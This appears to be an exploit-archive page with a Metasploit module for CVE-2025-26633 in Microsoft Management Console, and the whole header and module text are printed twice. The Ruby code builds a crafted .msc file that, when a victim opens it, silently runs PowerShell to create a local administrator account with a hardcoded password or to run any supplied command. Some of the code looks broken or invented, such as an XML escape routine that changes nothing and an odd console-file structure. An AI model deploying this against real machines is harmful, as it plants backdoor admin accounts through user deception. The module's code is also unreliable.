7
/ 10
HIGH
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
Description
This Metasploit local Windows exploit module abuses the way Microsoft Management Console MMC processes specially crafted .msc files to achieve arbitrary PowerShell execution when a user opens the file. The payload is designed to create a new local...
Basic Information
ID
PACKETSTORM:219768
Published
Apr 24, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : Microsoft MMC (.MSC) File Execution Abuse Leading to Local Admin Creation Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.microsoft.com |
==================================================================================================================================
[+] Summary : This Metasploit local Windows exploit module abuses the way Microsoft Management Console (MMC) processes specially crafted .msc files to achieve arbitrary PowerShell execution when a user opens the file.
The payload is designed to create a new local administrator account (or execute a custom command), but it only triggers when the victim manually opens the .msc file.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Windows::Priv
include Msf::Post::File
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft MMC MSC EvilTwin - Local Admin Creation (CVE-2025-26633)',
'Description' => %q{
This module exploits a vulnerability in Microsoft Management Console (MMC)
that allows arbitrary code execution when a user opens a specially crafted
.msc file.
},
'License' => MSF_LICENSE,
'Author' => [
'indoushka'
],
'Platform' => 'win',
'Arch' => [ARCH_X64, ARCH_X86],
'Targets' => [
[
'Windows (Local Admin Creation)',
{
'Platform' => 'win',
'Arch' => [ARCH_X64, ARCH_X86],
'Type' => :windows_admin
}
]
],
'DefaultTarget' => 0
)
)
register_options([
OptString.new('FILENAME', [true, 'Output .msc filename', 'CVE-2025-26633-AddAdmin.msc']),
OptString.new('USERNAME', [true, 'Local admin username to create', 'indoushka']),
OptString.new('PASSWORD', [true, 'Local admin password', '112233Az-*/@!']),
OptString.new('FULLNAME', [false, 'User full name', 'Lab User']),
OptString.new('DESCRIPTION', [false, 'User description', 'Research account']),
OptString.new('CUSTOM_COMMAND', [false, 'Custom command to execute instead of user creation', nil])
])
register_advanced_options([
OptBool.new('SILENT', [true, 'Run PowerShell silently', true]),
OptBool.new('VERBOSE_OUTPUT', [true, 'Show verbose PowerShell output', false])
])
end
def exploit
print_status("Creating malicious .msc file for CVE-2025-26633")
filename = datastore['FILENAME']
username = datastore['USERNAME']
password = datastore['PASSWORD']
fullname = datastore['FULLNAME']
description = datastore['DESCRIPTION']
powershell_cmd = build_powershell_payload(username, password, fullname, description)
msc_content = build_msc_file(powershell_cmd)
file_path = File.join(Msf::Config.local_directory, filename)
File.binwrite(file_path, msc_content)
print_good("Malicious .msc file created: #{file_path}")
store_loot(
'mmc.malicious.msc',
'application/octet-stream',
rhost,
msc_content,
filename,
'Malicious MSC file for CVE-2025-26633'
)
print_status("[*] Requires victim interaction to open MSC file")
print_status("[*] Example: mmc.exe \"#{filename}\"")
print_status("[+] Admin user: #{username}")
end
private
def build_powershell_payload(username, password, fullname, description)
if datastore['CUSTOM_COMMAND'] && !datastore['CUSTOM_COMMAND'].empty?
return datastore['CUSTOM_COMMAND']
end
ps_script = <<~PS
$user = '#{username}';
$pass = ConvertTo-SecureString '#{password}' -AsPlainText -Force;
New-LocalUser -Name $user -Password $pass -FullName '#{fullname}' -Description '#{description}' -ErrorAction SilentlyContinue;
Add-LocalGroupMember -Group 'Administrators' -Member $user -ErrorAction SilentlyContinue;
PS
ps_script = ps_script.strip.gsub(/\n\s+/, '; ')
cmd = "powershell.exe -NoP"
cmd += " -W Hidden" if datastore['SILENT']
cmd += " -NoExit" if datastore['VERBOSE_OUTPUT']
cmd += " -C \"#{ps_script}\""
cmd
end
def build_msc_file(command)
xml = <<~XML
<?xml version="1.0" encoding="utf-16"?>
<MMC_ConsoleFile ConsoleVersion="3.0">
<SnapIns>
<SnapIn>
<Actions>
<Action>
<RunCommand>#{escape_xml(command)}</RunCommand>
</Action>
</Actions>
</SnapIn>
</SnapIns>
</MMC_ConsoleFile>
XML
xml.strip.encode('utf-16le')
end
def escape_xml(text)
text.to_s
.gsub('&', '&')
.gsub('<', '<')
.gsub('>', '>')
.gsub('"', '"')
.gsub("'", ''')
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : Microsoft MMC (.MSC) File Execution Abuse Leading to Local Admin Creation Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.microsoft.com |
==================================================================================================================================
[+] Summary : This Metasploit local Windows exploit module abuses the way Microsoft Management Console (MMC) processes specially crafted .msc files to achieve arbitrary PowerShell execution when a user opens the file.
The payload is designed to create a new local administrator account (or execute a custom command), but it only triggers when the victim manually opens the .msc file.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Windows::Priv
include Msf::Post::File
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft MMC MSC EvilTwin - Local Admin Creation (CVE-2025-26633)',
'Description' => %q{
This module exploits a vulnerability in Microsoft Management Console (MMC)
that allows arbitrary code execution when a user opens a specially crafted
.msc file.
},
'License' => MSF_LICENSE,
'Author' => [
'indoushka'
],
'Platform' => 'win',
'Arch' => [ARCH_X64, ARCH_X86],
'Targets' => [
[
'Windows (Local Admin Creation)',
{
'Platform' => 'win',
'Arch' => [ARCH_X64, ARCH_X86],
'Type' => :windows_admin
}
]
],
'DefaultTarget' => 0
)
)
register_options([
OptString.new('FILENAME', [true, 'Output .msc filename', 'CVE-2025-26633-AddAdmin.msc']),
OptString.new('USERNAME', [true, 'Local admin username to create', 'indoushka']),
OptString.new('PASSWORD', [true, 'Local admin password', '112233Az-*/@!']),
OptString.new('FULLNAME', [false, 'User full name', 'Lab User']),
OptString.new('DESCRIPTION', [false, 'User description', 'Research account']),
OptString.new('CUSTOM_COMMAND', [false, 'Custom command to execute instead of user creation', nil])
])
register_advanced_options([
OptBool.new('SILENT', [true, 'Run PowerShell silently', true]),
OptBool.new('VERBOSE_OUTPUT', [true, 'Show verbose PowerShell output', false])
])
end
def exploit
print_status("Creating malicious .msc file for CVE-2025-26633")
filename = datastore['FILENAME']
username = datastore['USERNAME']
password = datastore['PASSWORD']
fullname = datastore['FULLNAME']
description = datastore['DESCRIPTION']
powershell_cmd = build_powershell_payload(username, password, fullname, description)
msc_content = build_msc_file(powershell_cmd)
file_path = File.join(Msf::Config.local_directory, filename)
File.binwrite(file_path, msc_content)
print_good("Malicious .msc file created: #{file_path}")
store_loot(
'mmc.malicious.msc',
'application/octet-stream',
rhost,
msc_content,
filename,
'Malicious MSC file for CVE-2025-26633'
)
print_status("[*] Requires victim interaction to open MSC file")
print_status("[*] Example: mmc.exe \"#{filename}\"")
print_status("[+] Admin user: #{username}")
end
private
def build_powershell_payload(username, password, fullname, description)
if datastore['CUSTOM_COMMAND'] && !datastore['CUSTOM_COMMAND'].empty?
return datastore['CUSTOM_COMMAND']
end
ps_script = <<~PS
$user = '#{username}';
$pass = ConvertTo-SecureString '#{password}' -AsPlainText -Force;
New-LocalUser -Name $user -Password $pass -FullName '#{fullname}' -Description '#{description}' -ErrorAction SilentlyContinue;
Add-LocalGroupMember -Group 'Administrators' -Member $user -ErrorAction SilentlyContinue;
PS
ps_script = ps_script.strip.gsub(/\n\s+/, '; ')
cmd = "powershell.exe -NoP"
cmd += " -W Hidden" if datastore['SILENT']
cmd += " -NoExit" if datastore['VERBOSE_OUTPUT']
cmd += " -C \"#{ps_script}\""
cmd
end
def build_msc_file(command)
xml = <<~XML
<?xml version="1.0" encoding="utf-16"?>
<MMC_ConsoleFile ConsoleVersion="3.0">
<SnapIns>
<SnapIn>
<Actions>
<Action>
<RunCommand>#{escape_xml(command)}</RunCommand>
</Action>
</Actions>
</SnapIn>
</SnapIns>
</MMC_ConsoleFile>
XML
xml.strip.encode('utf-16le')
end
def escape_xml(text)
text.to_s
.gsub('&', '&')
.gsub('<', '<')
.gsub('>', '>')
.gsub('"', '"')
.gsub("'", ''')
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================